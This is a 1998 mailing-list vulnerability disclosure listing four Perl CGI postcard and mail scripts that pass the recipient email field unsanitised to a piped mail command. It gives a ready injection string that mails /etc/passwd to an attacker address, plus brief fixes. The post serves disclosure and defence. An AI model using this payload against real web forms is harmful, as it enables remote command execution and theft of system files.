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Several new CGI vulnerabilities

daemon@ATHENA.MIT.EDU (xnec)
Mon Nov 9 19:54:50 1998

Date: 	Mon, 9 Nov 1998 18:26:05 -0600
Reply-To: xnec <xnec@WINTERMUTE.LINUX.TC>
From: xnec <xnec@WINTERMUTE.LINUX.TC>

        After looking over the perl-CGI scripts on www.cgi-resources.com,
I've discovered vulnerabilities in the following:

1. HAMcards Postcard script v1.0 Beta 2

2. Hot Postal Services v??
   note: the only metacharacter stripping this script does is rejecting
         any |'s

3.  RC Bowen's Postcards v??

4. LakeWeb's File Mail and Mail List (expanded File Mail) v??


Each of these are exploitable by inputing metacharacters into the
recipient's email address.  Each script calls something similar

 open( MAIL, "|$mailprog $email" )
 # this particular line is from the LakeWeb scripts

The exploit strings are simple, something like
&mail evil@foobar.com < /etc/passwd&@host.com will work for each script
(the @host.com is necessary because some hosts check for "@" and ".")
when placed in the Recipient Email field.

As a result, any command can be executed remotely without a local
account with the uid of the webserver (usually "nobody" or similar,
but you never know).

Either fork your sendmail process, strip out metacharacters (or only allow
certian characters), use open (MAIL , "|$sendmail -t") or rm -rf


# xnec@wintermute.linux.tc - xnec on DALnet and EFnet#

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